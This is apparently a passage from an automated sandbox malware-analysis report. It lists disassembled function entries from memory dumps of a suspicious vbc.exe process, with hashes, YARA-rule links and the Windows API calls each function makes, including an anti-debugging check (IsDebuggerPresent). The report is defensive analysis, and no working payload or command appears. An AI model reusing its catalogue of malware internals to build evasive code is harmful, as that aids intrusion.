                                                                                                                                                                      • Instruction ID: ab9eee1df1558e4090bc8b67d018b2e2f042ff0ec2ef097cbb4970e5acfd51c0
                                                                                                                                                                      • Opcode Fuzzy Hash: 49f01ab7346092539da7b2fb4ebb366b6ab3489dd262bc957b6d93f642452a5a
                                                                                                                                                                      • Instruction Fuzzy Hash: ED11BEB5604280CFDB15CF14D9C4B15BF62FB85314F24C6AAD8494B656C33AD84ACB62
                                                                                                                                                                      Function 0730D007 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2652822744.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 585b31c1e31f64ddb67b90e75ab235d24d11fd3da3f868802bcc532aad241ec0
                                                                                                                                                                      • Instruction ID: 95ddf219796f7cf62e5186d5ba97c4e475e08c3a0ddcea2f4b0c646b8ba01f18
                                                                                                                                                                      • Opcode Fuzzy Hash: 585b31c1e31f64ddb67b90e75ab235d24d11fd3da3f868802bcc532aad241ec0
                                                                                                                                                                      • Instruction Fuzzy Hash: 26015EB154D3C09FE7124B258C98752BFA8EF43224F1981DBE8888F1E3C2685C45CBB2
                                                                                                                                                                      Function 0730D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2652822744.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e4ad30accb07ff557f2ad0075c76f99f343baf77bf5ebff490170698c389a000
                                                                                                                                                                      • Instruction ID: 9cf0c62c1190ae8aa812712ab339a9aa0981192a9f4be94d54d47f1887175720
                                                                                                                                                                      • Opcode Fuzzy Hash: e4ad30accb07ff557f2ad0075c76f99f343baf77bf5ebff490170698c389a000
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01D4F16143409AF7204A51CC84B66BFC8EF42225F08C029EC4C0B5C2C2789845CAF7

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00D51361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D51459
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D51463
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00D51470
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                      • Opcode ID: 3cf6d14e918ff889318cc528b09367911a1633efb82f107397c3a16bb5ad504b
                                                                                                                                                                      • Instruction ID: 94f566506f8c97f1d9135320cf5ca86c7ab1bdd06aba0ef34befb1814bfb9889
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cf6d14e918ff889318cc528b09367911a1633efb82f107397c3a16bb5ad504b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2531C675901328ABCF21DF68D98979CBBB8EF48311F5042DAE81DA7250E7309F858F65
                                                                                                                                                                      Function 00D53F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,?,00D53F13,00000003,00D6DE80,0000000C,00D5403D,00000003,00000002,00000000,?,00D52038,00000003), ref: 00D53F5E
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00D53F13,00000003,00D6DE80,0000000C,00D5403D,00000003,00000002,00000000,?,00D52038,00000003), ref: 00D53F65
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00D53F77
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: a6b3346ea0f66fbdc4a242b10ce96f3fcbdf82fcfd0476ccc5d71839038e4aab
                                                                                                                                                                      • Instruction ID: ed3229ade8d36c7ea78ffbee8ffbcd3eab820c0ff849659881dd3b688960e556
                                                                                                                                                                      • Opcode Fuzzy Hash: a6b3346ea0f66fbdc4a242b10ce96f3fcbdf82fcfd0476ccc5d71839038e4aab
                                                                                                                                                                      • Instruction Fuzzy Hash: DAE04631404B08ABCF016F2DDC08A593B39EF44383F044018FC058B222CB39DE56CAB0
                                                                                                                                                                      Function 00483594 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                                                                      • Instruction ID: 41e836234758a3a873b0eb107039dab30ed17283a8094f1e23a75907f2704711
                                                                                                                                                                      • Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                                                                      • Instruction Fuzzy Hash: E931A02190A244BACE32BE1C981467F7B649B65F77F190D97E44066392F22D8F44936C
                                                                                                                                                                      Function 00D11130 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                      Function 00D3CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: d$w
                                                                                                                                                                      • API String ID: 0-2400632791
                                                                                                                                                                      • Opcode ID: 264be9a040329af85821a298646ca79b47df90acc0ff67c2c7dab0ac9cff9d18
                                                                                                                                                                      • Instruction ID: 4b94060673c04e2630504e1e7cc5525d4beafb7bbad99c002421bda83c41a385
                                                                                                                                                                      • Opcode Fuzzy Hash: 264be9a040329af85821a298646ca79b47df90acc0ff67c2c7dab0ac9cff9d18
                                                                                                                                                                      • Instruction Fuzzy Hash: 78C12362A3C340AECA3557288C1AB763B649B61770F4C3196FA95F60F3D755AC08A732
                                                                                                                                                                      Function 00D524FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00D52543
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53090
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530A2
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530B4
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530C6
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530D8
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530EA
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530FC
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D5310E
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53120
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53132
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53144
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53156
                                                                                                                                                                        • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53168
                                                                                                                                                                      • _free.LIBCMT ref: 00D52538
                                                                                                                                                                        • Part of subcall function 00D52096: HeapFree.KERNEL32(00000000,00000000,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?), ref: 00D520AC
                                                                                                                                                                        • Part of subcall function 00D52096: GetLastError.KERNEL32(?,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?,?), ref: 00D520BE
                                                                                                                                                                      • _free.LIBCMT ref: 00D5255A
                                                                                                                                                                      • _free.LIBCMT ref: 00D5256F
                                                                                                                                                                      • _free.LIBCMT ref: 00D5257A
                                                                                                                                                                      • _free.LIBCMT ref: 00D5259C
                                                                                                                                                                      • _free.LIBCMT ref: 00D525AF
                                                                                                                                                                      • _free.LIBCMT ref: 00D525BD
                                                                                                                                                                      • _free.LIBCMT ref: 00D525C8
                                                                                                                                                                      • _free.LIBCMT ref: 00D52600
                                                                                                                                                                      • _free.LIBCMT ref: 00D52607
                                                                                                                                                                      • _free.LIBCMT ref: 00D52624
                                                                                                                                                                      • _free.LIBCMT ref: 00D5263C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                      • Opcode ID: 717549f5622e2730353b043ce6f38bbcb63c982a7e9777203f386abd2db88767
                                                                                                                                                                      • Instruction ID: 720878af43a6430775b64a497160732ba3e95374e72187018ff23ba9fecf5115
                                                                                                                                                                      • Opcode Fuzzy Hash: 717549f5622e2730353b043ce6f38bbcb63c982a7e9777203f386abd2db88767
                                                                                                                                                                      • Instruction Fuzzy Hash: EC311A71A007059BEF31AA78D845B66B3E9FB02352F184429EC5AD7191EE71ED8CCB30
                                                                                                                                                                      Function 00D57B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00D58311,?,00000000,?,00000000,00000000), ref: 00D57BDE
                                                                                                                                                                      • __fassign.LIBCMT ref: 00D57C59
                                                                                                                                                                      • __fassign.LIBCMT ref: 00D57C74
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00D57C9A
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00D58311,00000000,?,?,?,?,?,?,?,?,?,00D58311,?), ref: 00D57CB9
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00D58311,00000000,?,?,?,?,?,?,?,?,?,00D58311,?), ref: 00D57CF2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                      • Opcode ID: 0c907ee0a317d17608f1e5af4edf363380f5a39cb0587f9ec3ef9cb7410d2e93
                                                                                                                                                                      • Instruction ID: 1c292177a7f5b8687450b824f7aaafd5fd1855c6586f7ab18d2d0bb7827509d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 0c907ee0a317d17608f1e5af4edf363380f5a39cb0587f9ec3ef9cb7410d2e93
                                                                                                                                                                      • Instruction Fuzzy Hash: A6517071A043499FCF10CFA8E885AEEBBF4EF09301F24455AED59E7291E6309945CBB1
                                                                                                                                                                      Function 00D53216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00D531DA: _free.LIBCMT ref: 00D53203
                                                                                                                                                                      • _free.LIBCMT ref: 00D53264
                                                                                                                                                                        • Part of subcall function 00D52096: HeapFree.KERNEL32(00000000,00000000,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?), ref: 00D520AC
                                                                                                                                                                        • Part of subcall function 00D52096: GetLastError.KERNEL32(?,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?,?), ref: 00D520BE
                                                                                                                                                                      • _free.LIBCMT ref: 00D5326F
                                                                                                                                                                      • _free.LIBCMT ref: 00D5327A
                                                                                                                                                                      • _free.LIBCMT ref: 00D532CE
                                                                                                                                                                      • _free.LIBCMT ref: 00D532D9
                                                                                                                                                                      • _free.LIBCMT ref: 00D532E4
                                                                                                                                                                      • _free.LIBCMT ref: 00D532EF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                      • Instruction ID: e8d9b8a5c2236fcaf7743f33c9878cb621996e1dd84f888cf7ce537210261c51
                                                                                                                                                                      • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                      • Instruction Fuzzy Hash: 0711FC72A41B04AADD30FBB0CC07FDB779CEF06742F444C15BE9AA6092DA65A60C8770
                                                                                                                                                                      Function 0040C73D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fileno$__lock_file
                                                                                                                                                                      • String ID: 'B
                                                                                                                                                                      • API String ID: 90028640-2787509829
                                                                                                                                                                      • Opcode ID: 1f8bbaa44f9990446b1d1c28f2d2b7d5c9b6dbab54d1b4072eff8aa4ab07f8e7
                                                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f8bbaa44f9990446b1d1c28f2d2b7d5c9b6dbab54d1b4072eff8aa4ab07f8e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                      Function 00D544E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00D5473A,?,?,00000000), ref: 00D54543
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00D5473A,?,?,00000000,?,?,?), ref: 00D545C9
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D546C3
                                                                                                                                                                      • __freea.LIBCMT ref: 00D546D0
                                                                                                                                                                        • Part of subcall function 00D532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00D5332C
                                                                                                                                                                      • __freea.LIBCMT ref: 00D546D9
                                                                                                                                                                      • __freea.LIBCMT ref: 00D546FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                      • Opcode ID: 698df1f396da2bea8904455cf12f3969361dbed8d64705e2c0897ff5682954e0
                                                                                                                                                                      • Instruction ID: 76a89ee7510d6bb6bf88afd23dd8eba1d208bb24927589d13020d64ace4d5809
                                                                                                                                                                      • Opcode Fuzzy Hash: 698df1f396da2bea8904455cf12f3969361dbed8d64705e2c0897ff5682954e0
                                                                                                                                                                      • Instruction Fuzzy Hash: D051DE72600216ABEF259E64CC42FEF77A9EB4575AF194228FC04D7180EB34DC98C672
                                                                                                                                                                      Function 004057B0 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,?,?,0040D128,00000001,?,?,?,?,?,0040AF59,?), ref: 0040B8C4
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
